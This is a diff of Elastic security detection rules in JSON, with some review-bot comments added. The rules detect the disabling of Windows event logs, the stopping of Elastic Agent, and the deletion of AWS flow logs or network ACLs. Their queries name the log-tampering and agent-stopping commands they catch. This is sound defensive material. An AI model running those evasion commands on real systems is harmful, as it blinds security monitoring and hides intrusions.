Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n\n ((process.name:\"logman.exe\" or process.pe.original_file_name == \"Logman.exe\") and\n process.args : \"EventLog-*\" and process.args : (\"stop\", \"delete\")) or\n\n ((process.name : (\"pwsh.exe\", \"powershell.exe\", \"powershell_ise.exe\") or process.pe.original_file_name in\n (\"pwsh.exe\", \"powershell.exe\", \"powershell_ise.exe\")) and\n\tprocess.args : \"Set-Service\" and process.args: \"EventLog\" and process.args : \"Disabled\") or\n\t\n ((process.name:\"auditpol.exe\" or process.pe.original_file_name == \"AUDITPOL.EXE\") and process.args : \"/success:disable\")\n", + "note": "## Triage and analysis\n\n### Investigating Disable Windows Event and Security Logs Using Built-in Tools\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. 
Adversaries\ncan tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the usage of different utilities to disable the EventLog service or specific event logs.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Re-enable affected logging components, services, and security monitoring.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.type in (\"start\", \"process_started\") and\n\n ((process.name:\"logman.exe\" or process.pe.original_file_name == \"Logman.exe\") and\n process.args : \"EventLog-*\" and process.args : (\"stop\", \"delete\")) or\n\n ((process.name : (\"pwsh.exe\", \"powershell.exe\", \"powershell_ise.exe\") or process.pe.original_file_name in\n (\"pwsh.exe\", \"powershell.exe\", \"powershell_ise.exe\")) and\n\tprocess.args : \"Set-Service\" and process.args: \"EventLog\" and process.args : \"Disabled\") or\n\n ((process.name:\"auditpol.exe\" or process.pe.original_file_name == \"AUDITPOL.EXE\") and process.args : \"/success:disable\")\n", "references": [ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/logman", "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "4de76544-f0e5-486a-8f84-eae0b6063cdc", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ 
"Elastic", @@ -68,5 +91,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_dns_over_https_enabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_dns_over_https_enabled.json index 0c4fb8d0cd9dd..198e150934592 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_dns_over_https_enabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_dns_over_https_enabled.json 
@@ -12,14 +12,32 @@ "language": "eql", "license": "Elastic License v2", "name": "DNS-over-HTTPS Enabled via Registry", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "registry where event.type in (\"creation\", \"change\") and\n (registry.path : \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled\" and\n registry.data.strings : \"1\") or\n (registry.path : \"*\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode\" and\n registry.data.strings : \"secure\") or\n (registry.path : \"*\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\" and\n registry.data.strings : \"1\")\n", "references": [ "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "a22a09c2-2162-4df0-a356-9aacbeb56a04", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -47,5 +65,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } 
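Review bot: The added line `+ "note": "",` leaves an empty `note` key behind after its only content moved to the new `setup` field, whereas rules without investigation guidance elsewhere in this diff (for example `defense_evasion_disable_selinux_attempt.json`) omit the key entirely. Dropping the line instead of emptying it keeps the prepackaged rules consistent and, if the UI renders the field whenever it is present, avoids showing an empty investigation guide. The `Suspicious .NET Code Compilation` hunk makes the same `"note": ""` substitution.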
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_domain_added_to_google_workspace_trusted_domains.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_domain_added_to_google_workspace_trusted_domains.json
new file mode 100644
index 0000000000000..bc0f2d527003f
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_domain_added_to_google_workspace_trusted_domains.json
@@ -0,0 +1,91 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects when a domain is added to the list of trusted Google Workspace domains. An adversary may add a trusted domain in order to collect and exfiltrate data from their target\u2019s organization with less restrictive security controls.", + "false_positives": [ + "Trusted domains may be added by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-130m", + "index": [ + "filebeat-*", + "logs-google_workspace*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Domain Added to Google Workspace Trusted Domains", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:ADD_TRUSTED_DOMAINS\n", + "references": [ + "https://support.google.com/a/answer/6160020?hl=en" + ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "cf549724-c577-4fd6-8f9b-d1b8ec519ec0", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Elastic", + "Cloud", + "Google Workspace", + "Continuous Monitoring", + "SecOps", + "Configuration Audit", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.007", + "name": "Disable or Modify Cloud Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 14 +} 
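Review bot: `"version": 14` on a file added with `new file mode` is unexpected for a brand-new prepackaged rule, whose version would normally start at 1; presumably this rule already shipped under another filename and `rule_id` cf549724-c577-4fd6-8f9b-d1b8ec519ec0 is the continuity point, with the version history carried over. If so, a one-line mention in the commit message would save the next reader the question; if the rule really is new, the value should be reset so that upgrade logic keyed on `version` behaves as for other new rules.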
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_dotnet_compiler_parent_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_dotnet_compiler_parent_process.json
index 96d7c2a2ebbdc..5875ff001b74c 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_dotnet_compiler_parent_process.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_dotnet_compiler_parent_process.json
@@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious .NET Code Compilation", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : (\"csc.exe\", \"vbc.exe\") and\n process.parent.name : (\"wscript.exe\", \"mshta.exe\", \"cscript.exe\", \"wmic.exe\", \"svchost.exe\", \"rundll32.exe\", \"cmstp.exe\", \"regsvr32.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "201200f1-a99b-43fb-88ed-f65a45c4972c", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ec2_flow_log_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ec2_flow_log_deletion.json index d93764d893ef6..c90db2e5eaf03 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ec2_flow_log_deletion.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ec2_flow_log_deletion.json 
@@ -14,15 +14,45 @@ "interval": "10m", "language": "kuery", "license": "Elastic License v2", - "name": "AWS EC2 Flow Log Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "name": "AWS VPC Flow Logs Deletion", + "note": "## Triage and analysis\n\n### Investigating AWS VPC Flow Logs Deletion\n\nVPC Flow Logs is an AWS feature that enables you to capture information about the IP traffic going to and from network\ninterfaces in your virtual private cloud (VPC). Flow log data can be published to Amazon CloudWatch Logs or Amazon S3.\n\nThis rule identifies the deletion of VPC flow logs using the API `DeleteFlowLogs` action. Attackers can do this to cover\ntheir tracks and impact security monitoring that relies on this source.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- 
If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n- Administrators may rotate these logs after a certain period as part of their retention policy or after importing them\nto a SIEM.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:DeleteFlowLogs and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-flow-logs.html", "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteFlowLogs.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "9395fd2c-9947-4472-86ef-4aceb2f7e872", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", 
@@ -58,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ec2_network_acl_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ec2_network_acl_deletion.json index 0e019e84c8298..297d1fc0fcab2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ec2_network_acl_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ec2_network_acl_deletion.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS EC2 Network Access Control List Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:(DeleteNetworkAcl or DeleteNetworkAclEntry) and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-network-acl.html", 
@@ -23,8 +23,38 @@ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-network-acl-entry.html", "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteNetworkAclEntry.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "8623535c-1e17-44e1-aa97-7a0699c3037d", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -60,5 +90,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elastic_agent_service_terminated.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elastic_agent_service_terminated.json index e7dc47dcbd109..c6d5938abf6f7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elastic_agent_service_terminated.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elastic_agent_service_terminated.json 
@@ -10,10 +10,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Elastic Agent Service Terminated", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where\n/* net, sc or wmic stopping or deleting Elastic Agent on Windows */\n(event.type == \"start\" and\n process.name : (\"net.exe\", \"sc.exe\", \"wmic.exe\",\"powershell.exe\",\"taskkill.exe\",\"PsKill.exe\",\"ProcessHacker.exe\") and \n process.args : (\"stopservice\",\"uninstall\", \"stop\", \"disabled\",\"Stop-Process\",\"terminate\",\"suspend\") and\n process.args : (\"elasticendpoint\", \"Elastic Agent\",\"elastic-agent\",\"elastic-endpoint\")) \nor\n/* service or systemctl used to stop Elastic Agent on Linux */\n(event.type == \"end\" and\n (process.name : (\"systemctl\",\"service\") and \n process.args : (\"elastic-agent\", \"stop\")) \n or \n /* Unload Elastic Agent extension on MacOS */\n (process.name : \"kextunload\" and\n process.args : \"com.apple.iokit.EndpointSecurity\" and \n event.action : \"end\"))\n", + "note": "", + "query": "process where\n/* net, sc or wmic stopping or deleting Elastic Agent on Windows */\n(event.type == \"start\" and\n process.name : (\"net.exe\", \"sc.exe\", \"wmic.exe\",\"powershell.exe\",\"taskkill.exe\",\"PsKill.exe\",\"ProcessHacker.exe\") and\n process.args : (\"stopservice\",\"uninstall\", \"stop\", \"disabled\",\"Stop-Process\",\"terminate\",\"suspend\") and\n process.args : (\"elasticendpoint\", \"Elastic Agent\",\"elastic-agent\",\"elastic-endpoint\"))\nor\n/* service or systemctl used to stop Elastic Agent on Linux */\n(event.type == \"end\" and\n (process.name : (\"systemctl\", \"service\") and \n process.args : \"elastic-agent\" and\n process.args : 
\"stop\") \n or \n /* Unload Elastic Agent extension on MacOS */\n (process.name : \"kextunload\" and\n process.args : \"com.apple.iokit.EndpointSecurity\" and\n event.action : \"end\"))\n", + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b627cd12-dac4-11ec-9582-f661ea17fbcd", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elasticache_security_group_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elasticache_security_group_creation.json index 38f6d22bef189..0508fdbca2d48 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elasticache_security_group_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elasticache_security_group_creation.json 
@@ -15,13 +15,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS ElastiCache Security Group Created", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:elasticache.amazonaws.com and event.action:\"Create Cache Security Group\" and \nevent.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:elasticache.amazonaws.com and event.action:\"Create Cache Security Group\" and\nevent.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AmazonElastiCache/latest/APIReference/API_CreateCacheSecurityGroup.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "7b3da11a-60a2-412e-8aa7-011e1eb9ed47", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -57,5 +87,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elasticache_security_group_modified_or_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elasticache_security_group_modified_or_deleted.json index 0ba4be1170091..7c6f6dcd44010 100644 
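Review bot: The rewritten query line keeps `event.action:"Create Cache Security Group"` with spaces, while the sibling rule in the following file section (the modified-or-deleted rule) mixes spaced values such as `"Delete Cache Security Group"` and `"Authorize Cache Security Group Ingress"` with CamelCase ones such as `"AuthorizeCacheSecurityGroupEgress"` in the same list. CloudTrail's `eventName` for these calls is the API operation name (`CreateCacheSecurityGroup`, `DeleteCacheSecurityGroup`, `AuthorizeCacheSecurityGroupIngress`, `RevokeCacheSecurityGroupIngress`), as the referenced API documentation uses, so unless the ingest pipeline rewrites the name with spaces — which is not visible here — the spaced variants likely never match and the two rules would only fire on the two egress actions. Suggested for this rule: `event.action:"CreateCacheSecurityGroup"`, and for the sibling rule `event.action:("DeleteCacheSecurityGroup" or "AuthorizeCacheSecurityGroupIngress" or "RevokeCacheSecurityGroupIngress" or "AuthorizeCacheSecurityGroupEgress" or "RevokeCacheSecurityGroupEgress")`, verified against a sample CloudTrail record before changing the pinned rule version again. This hunk shares its physical line with the version-bump hunk and the next file header.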
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elasticache_security_group_modified_or_deleted.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_elasticache_security_group_modified_or_deleted.json 
@@ -15,13 +15,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS ElastiCache Security Group Modified or Deleted", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:elasticache.amazonaws.com and event.action:(\"Delete Cache Security Group\" or \n\"Authorize Cache Security Group Ingress\" or \"Revoke Cache Security Group Ingress\" or \"AuthorizeCacheSecurityGroupEgress\" or \n\"RevokeCacheSecurityGroupEgress\") and event.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:elasticache.amazonaws.com and event.action:(\"Delete Cache Security Group\" or\n\"Authorize Cache Security Group Ingress\" or \"Revoke Cache Security Group Ingress\" or \"AuthorizeCacheSecurityGroupEgress\" or\n\"RevokeCacheSecurityGroupEgress\") and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AmazonElastiCache/latest/APIReference/Welcome.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "1ba5160d-f5a2-4624-b0ff-6a1dc55d2516", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -57,5 +87,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_enable_inbound_rdp_with_netsh.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_enable_inbound_rdp_with_netsh.json index 455f652b29bb3..dae0a09044434 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_enable_inbound_rdp_with_netsh.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_enable_inbound_rdp_with_netsh.json 
@@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote Desktop Enabled in Windows Firewall by Netsh", - "note": "## Triage and analysis\n\n### Investigating Remote Desktop Enabled in Windows Firewall by Netsh\n\nMicrosoft Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol that enables remote connections to other\ncomputers, typically over TCP port 3389.\n\nAttackers can use RDP to conduct their actions interactively. Ransomware operators frequently use RDP to access\nvictim servers, often using privileged accounts.\n\nThis rule detects the creation of a Windows Firewall inbound rule that would allow inbound RDP traffic using the\n`netsh.exe` utility.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense to enable RDP to this host, given its role in the environment.\n- Check if the host is directly exposed to the internet.\n- Check whether privileged accounts accessed the host shortly after the modification.\n- Review network events within a short timespan of this alert for incoming RDP connection attempts.\n\n### False positive analysis\n\n- The `netsh.exe` utility can be used legitimately. 
Check whether the user should be performing this kind of activity, whether the user is aware\nof it, whether RDP should be open, and whether the action exposes the environment to unnecessary risks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If RDP is needed, make sure to secure it:\n - Allowlist RDP traffic to specific trusted hosts.\n - Restrict RDP logins to authorized non-administrator accounts, where possible.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Remote Desktop Enabled in Windows Firewall by Netsh\n\nMicrosoft Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol that enables remote connections to other\ncomputers, typically over TCP port 3389.\n\nAttackers can use RDP to conduct their actions interactively. 
